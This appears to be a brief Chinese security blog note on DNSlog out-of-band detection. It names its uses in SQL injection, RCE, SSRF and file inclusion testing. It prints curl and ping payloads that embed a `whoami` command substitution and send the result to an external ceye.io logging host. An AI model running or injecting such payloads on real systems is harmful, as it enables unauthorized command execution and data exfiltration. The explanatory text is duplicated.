DNSlog
1.原理
通过恶意payload组合的三级域名后对服务器发起的DNS请求。
2.利用场景
- SQL注入
- RCE(远程命令执行)
- SSRF(服务端请求伪造)
- RFI(远程文件包含)
3.Payload example
curl http://huanxin.ceye.io/`whoami` ping `whoami`.huanxin.ceye.io
总结:一切存有HTTP请求,域名请求时都可尝试DNSlog
通过恶意payload组合的三级域名后对服务器发起的DNS请求。
curl http://huanxin.ceye.io/`whoami` ping `whoami`.huanxin.ceye.io
总结:一切存有HTTP请求,域名请求时都可尝试DNSlog
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· 一文读懂知识蒸馏
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下